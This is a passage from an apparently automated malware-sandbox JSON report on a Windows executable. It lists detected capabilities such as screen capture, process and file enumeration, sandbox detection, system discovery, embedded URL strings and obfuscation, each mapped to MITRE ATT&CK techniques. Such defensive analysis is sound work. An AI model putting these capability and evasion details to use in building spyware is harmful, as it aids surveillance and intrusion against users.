"\"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" called \"IsWow64Process\" with parameter \"5872\" - (UID: 00000000-00005872)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005872)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-207", "type": 2, "relevance": 1, "name": "Contains ability to retrieve file and directory information (API string)", "description": "Found reference to API \"GetFileAttributesA\" (Indicator: \"GetFileAttributes\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetCurrentDirectoryA\" (Indicator: \"GetCurrentDirectory\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetTempPathA\" (Indicator: \"GetTempPath\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetSystemDirectoryA\" (Indicator: \"GetSystemDirectory\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetFileSize\" (Indicator: \"GetFileSize\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"SHGetSpecialFolderLocation\" (Indicator: \"SHGetSpecialFolderLocation\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetFileVersionInfoSizeA\" (Indicator: \"GetFileVersionInfo\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetFileVersionInfoSizeA\" (Indicator: \"GetFileVersionInfoSize\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetFileVersionInfoA\" (Indicator: \"GetFileVersionInfo\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetFileAttributesW\" (Indicator: \"GetFileAttributes\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetSystemDirectoryW\" (Indicator: \"GetSystemDirectory\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetSystemDirectoryW\" (Indicator: \"GetSystemDirectory\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API \"GetFileAttributesW\" (Indicator: \"GetFileAttributes\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API \"GetTempPathA\" (Indicator: \"GetTempPath\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"GetSystemDirectoryA\" (Indicator: \"GetSystemDirectory\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"GetFileSize\" (Indicator: \"GetFileSize\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"GetFileAttributesA\" (Indicator: \"GetFileAttributes\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"SHGetSpecialFolderLocation\" (Indicator: \"SHGetSpecialFolderLocation\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"GetFileVersionInfoA\" (Indicator: \"GetFileVersionInfo\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"GetFileVersionInfoSizeA\" (Indicator: \"GetFileVersionInfo\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"GetFileVersionInfoSizeA\" (Indicator: \"GetFileVersionInfoSize\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"GetTempPathA\" (Indicator: \"GetTempPath\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API \"GetCurrentDirectoryA\" (Indicator: \"GetCurrentDirectory\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API \"GetFileAttributesA\" (Indicator: \"GetFileAttributes\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-78", "type": 2, "relevance": 1, "name": "Contains ability to capture screen (API string)", "description": "Found reference to API \"GetDIBits\" (Indicator: \"GetDIBits\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"BitBlt\" (Indicator: \"BitBlt\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"CreateCompatibleDC\" (Indicator: \"CreateCompatibleDC\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"CreateCompatibleBitmap\" (Indicator: \"CreateCompatibleBitmap\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetWindowDC\" (Indicator: \"GetWindowDC\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetDesktopWindow\" (Indicator: \"GetDesktopWindow\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetDesktopWindow\" (Indicator: \"GetDesktopWindow\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"GetWindowDC\" (Indicator: \"GetWindowDC\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"GetDIBits\" (Indicator: \"GetDIBits\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"BitBlt\" (Indicator: \"BitBlt\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"CreateCompatibleBitmap\" (Indicator: \"CreateCompatibleBitmap\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"CreateCompatibleDC\" (Indicator: \"CreateCompatibleDC\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-84", "type": 2, "relevance": 1, "name": "Contains ability to find logical drives of the machine (API string)", "description": "Found reference to API \"GetLogicalDriveStringsA\" (Indicator: \"GetLogicalDriveStrings\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetLogicalDriveStringsA\" (Indicator: \"GetLogicalDriveStrings\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-534", "type": 2, "name": "Contains ability to read files (API string)", "description": "Found reference to API \"ReadFile\" (Indicator: \"ReadFile\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"ReadFile\" (Indicator: \"ReadFile\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-85", "type": 2, "relevance": 1, "name": "Contains ability to enumerate process and/or its information (API string)", "description": "Found reference to API \"CreateToolhelp32Snapshot\" (Indicator: \"CreateToolhelp32Snapshot\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetEnvironmentStringsW\" (Indicator: \"GetEnvironmentStrings\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"Process32Next\" (Indicator: \"Process32Next\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetCurrentProcess\" (Indicator: \"GetCurrentProcess\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetEnvironmentStrings\" (Indicator: \"GetEnvironmentStrings\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetCurrentProcessId\" (Indicator: \"GetCurrentProcess\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"Process32First\" (Indicator: \"Process32First\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetModuleHandleW\" (Indicator: \"GetModuleHandle\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetModuleHandleExW\" (Indicator: \"GetModuleHandle\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetModuleHandleW\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"GetCurrentProcessId\" (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"GetCurrentProcess\" (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"GetModuleHandleExW\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API \"GetEnvironmentStrings\" (Indicator: \"GetEnvironmentStrings\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"GetEnvironmentStringsW\" (Indicator: \"GetEnvironmentStrings\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"Process32Next\" (Indicator: \"Process32Next\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API \"Process32First\" (Indicator: \"Process32First\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API \"CreateToolhelp32Snapshot\" (Indicator: \"CreateToolhelp32Snapshot\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API \"GetCurrentProcessId\" (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API \"GetCurrentProcess\" (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API \"GetEnvironmentStrings\" (Indicator: \"GetEnvironmentStrings\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API \"GetEnvironmentStringsW\" (Indicator: \"GetEnvironmentStrings\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-164", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the fully qualified path of module (API string)", "description": "Found reference to API \"GetModuleFileNameA\" (Indicator: \"GetModuleFileName\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetModuleFileNameW\" (Indicator: \"GetModuleFileName\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetModuleFileNameW\" (Indicator: \"GetModuleFileName\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API \"GetModuleFileNameA\" (Indicator: \"GetModuleFileName\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"GetModuleFileNameA\" (Indicator: \"GetModuleFileName\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-317", "type": 2, "relevance": 1, "name": "Contains ability to retrieve address of exported function from a DLL (API string)", "description": "Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-122", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the NetBIOS name of the local computer (API string)", "description": "Found reference to API \"GetComputerNameA\" (Indicator: \"GetComputerName\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetComputerNameA\" (Indicator: \"GetComputerName\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"GetComputerNameA\" (Indicator: \"GetComputerName\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-427", "type": 2, "relevance": 1, "name": "Contains ability to retrieve a module handle (API string)", "description": "Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetModuleHandleW\" (Indicator: \"GetModuleHandle\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetModuleHandleExW\" (Indicator: \"GetModuleHandle\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetModuleHandleW\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"GetModuleHandleExW\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-115", "type": 2, "relevance": 3, "name": "Contains ability to retrieve data about the local computer (API string)", "description": "Found reference to API \"InterlockedExchange\" (Indicator: \"InterlockedExchange\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"InterlockedExchange\" (Indicator: \"InterlockedExchange\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"InterlockedExchange\" (Indicator: \"InterlockedExchange\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-80", "type": 2, "relevance": 1, "name": "Contains ability to determine disk drive type (API string)", "description": "Found reference to API \"GetDriveTypeA\" (Indicator: \"GetDriveType\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetDriveTypeA\" (Indicator: \"GetDriveType\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-205", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the time elapsed since the system was started (API string)", "description": "Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "static-132", "relevance": 1, "name": "Contains ability to detect sandbox (imports API)", "description": "Found GetCursorPos() in an import section (Source: gegdsimsogm.exe)", "origin": "Static Parser", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-121", "type": 2, "relevance": 1, "name": "Contains ability to retrieve usernames and/or user information (API string)", "description": "Found reference to API \"GetProcessWindowStation\" (Indicator: \"GetProcessWindowStation\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetUserObjectInformationA\" (Indicator: \"GetUserObjectInformation\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetTokenInformation\" (Indicator: \"GetTokenInformation\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetUserNameA\" (Indicator: \"GetUserName\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetProcessWindowStation\" (Indicator: \"GetProcessWindowStation\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"GetUserObjectInformationA\" (Indicator: \"GetUserObjectInformation\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"GetUserNameA\" (Indicator: \"GetUserName\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"GetTokenInformation\" (Indicator: \"GetTokenInformation\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"GetProcessWindowStation\" (Indicator: \"GetProcessWindowStation\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")\n Found reference to API \"GetUserObjectInformationA\" (Indicator: \"GetUserObjectInformation\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-83", "type": 2, "relevance": 1, "name": "Contains ability to enumerate files on disk (API string)", "description": "Found reference to API \"FindFirstFileA\" (Indicator: \"FindFirstFile\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"FindNextFileA\" (Indicator: \"FindNextFile\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"FindNextFileA\" (Indicator: \"FindNextFile\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"FindFirstFileA\" (Indicator: \"FindFirstFile\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-131", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the specified system metric or system configuration setting (API string)", "description": "Found reference to API \"GetSystemMetrics\" (Indicator: \"GetSystemMetrics\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"GetSystemMetrics\" (Indicator: \"GetSystemMetrics\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-229", "type": 2, "relevance": 1, "name": "Contains ability to query registry keys (API string)", "description": "Found reference to API \"RegQueryValueExW\" (Indicator: \"RegQueryValue\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"RegOpenKeyExW\" (Indicator: \"RegOpenKey\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"RegQueryValueExW\" (Indicator: \"RegQueryValue\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API \"RegOpenKeyExW\" (Indicator: \"RegOpenKey\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-82", "type": 2, "relevance": 1, "name": "Contains ability to retrieves the class object from a DLL object handler (API string)", "description": "Found reference to API \"p_DllGetClassObject\" (Indicator: \"DllGetClassObject\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")", "origin": "File/Memory"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "static-88", "relevance": 1, "name": "Imports GetCommandLine API", "description": "Observed import api \"GetCommandLineA\" which can \"Retrieves the command-line string for the current process\" [Source: c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110]\n Observed import api \"GetCommandLineA\" which can \"Retrieves the command-line string for the current process\" [Source: gegdsimsogm.exe]", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-3", "type": 2, "relevance": 3, "name": "Found potential URL in binary/memory", "description": "Heuristic match: \"vm3d.cat\"\n Heuristic match: \"pathext=.co\"\n Heuristic match: \"th<.td\"\n Pattern match: \"www.ebay.com/\"\n Pattern match: \"www.baidu.com/\"\n Pattern match: \"www.imdb.com/\"\n Pattern match: \"www.bbc.co.uk/\"\n Pattern match: \"www.adobe.com/\"\n Pattern match: \"www.blogger.com/\"\n Pattern match: \"www.wikipedia.org/\"\n Pattern match: \"www.yahoo.com/\"\n Pattern match: \"www.youtube.com/\"\n Pattern match: \"www.myspace.com/\"\n Pattern match: \"www.facebook.com/\"\n Pattern match: \"www.google.com/\"\n Pattern match: \"http://%s/\"\n Pattern match: \"http://schemas.xmlsoap.org/soap/encoding/\"\n Pattern match: \"http://schemas.xmlsoap.org/soap/envelope/\"\n Heuristic match: \"command.com\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "memorydump-2", "type": 20, "relevance": 1, "name": "Found potential URLs in memory dumps", "description": "Found URL \"http://nulllsatpcidbtlc.dat%s/%s=%dskypetooltips_class32twittersvchost.exeunknownsedebugprivilege:\\system\" - Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found URL \"http://%s/urlbasemodelnamefriendlynameget\" - Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found URL \"http://schemas.xmlsoap.org/soap/encoding/\" - Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found URL \"http://schemas.xmlsoap.org/soap/envelope/\" - Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")", "origin": "Memory Dumps", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-14", "type": 2, "name": "Found potential IP address in binary/memory", "description": "\"<IPv4>\"\n Potential IP \"<IPv4>\" found in string \"HOST: <IPv4>:1900\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-457", "type": 2, "relevance": 1, "name": "Found string related to HTTP headers", "description": "Found string \"GET %s HTTP/1.1\" (Indicator: \"HTTP/1.1\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found string \"M-SEARCH * HTTP/1.1\" (Indicator: \"HTTP/1.1\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found string \"HTTP/1.1\" (Indicator: \"HTTP/1.1\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "binary-71", "type": 8, "relevance": 1, "name": "Sample file has high entropy (likely encrypted/compressed content)", "description": "Sample file \"sample.bin\" has high entropy 7.854727266972962", "origin": "Binary File", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-28", "type": 15, "relevance": 1, "name": "Shows ability to obfuscate file or information", "description": "The analysis contains indicators for cyrpto or data obfuscation(base64/decrypt) which can hide information. Matched sigs: Dropped file has high entropy (likely encrypted/compressed content)\n Matched sigs: Sample file has high entropy (likely encrypted/compressed content)", "origin": "Indicator Combinations", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-114", "type": 2, "relevance": 1, "name": "Contains ability to obtains specified information about the security of a file or directory (API string)", "description": "Found reference to API \"GetTokenInformation\" (Indicator: \"GetTokenInformation\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"SetSecurityDescriptorDacl\" (Indicator: \"SetSecurityDescriptorDacl\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"AddAccessAllowedAce\" (Indicator: \"AddAccessAllowedAce\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"InitializeSecurityDescriptor\" (Indicator: \"InitializeSecurityDescriptor\"; File: 